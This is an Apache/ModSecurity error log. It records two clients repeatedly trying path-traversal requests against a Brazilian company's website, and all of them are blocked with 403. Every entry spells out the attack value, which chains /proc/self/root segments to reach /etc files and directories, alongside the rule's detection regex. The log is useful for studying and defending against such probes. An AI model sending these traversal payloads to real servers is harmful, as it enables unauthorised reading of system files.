[Mon Mar 16 12:50:19.627058 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.241.46:58488] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmu5qj1wV0Si-OkefuewAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:50:21.919917 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:38350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmvQlT9VtDQc7bgUyyTgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:24.326505 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:57322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmwHjZBu2q05ozVU9X6gAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:26.682272 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:57328] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmwtSswJuvopo3lOhfZAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:27.966730 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:57330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmw9SswJuvopo3lOhfZQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:29.245873 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:57332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmxRXjF1vJNtV6CWr2jQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:29.551793 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:58498] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmxbysWC90G-1nBrBFnwAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:50:30.559617 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:52576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmxhXjF1vJNtV6CWr2jgAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:36.819011 2026] [:error] [pid 10709:tid 140411557287680] [client 74.7.243.203:52582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgmzBXjF1vJNtV6CWr2lQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:42.550777 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:52594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm0nbQATo66fKoS7xPzwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:50:46.490066 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:52046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm1o6lpbStxTqkSktszQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:11.235971 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.241.46:38648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm73jZBu2q05ozVU9YFgAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:51:11.989423 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:52050] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm77ysWC90G-1nBrBFuQAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:15.707264 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:49218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm83bQATo66fKoS7xP4AAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:16.771544 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.241.46:34950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm9AlT9VtDQc7bgUyyZgAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:51:17.068030 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:49228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm9dSswJuvopo3lOhfcgAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:18.394182 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:49236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm9tSswJuvopo3lOhfcwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:19.583361 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:49242] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm99SswJuvopo3lOhfdgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:24.103946 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:58330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm_LABkC4fWIHEf8HrjgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:25.389381 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:58342] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm_bABkC4fWIHEf8HrkAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:51:26.658405 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:58344] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgm_njZBu2q05ozVU9YFwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
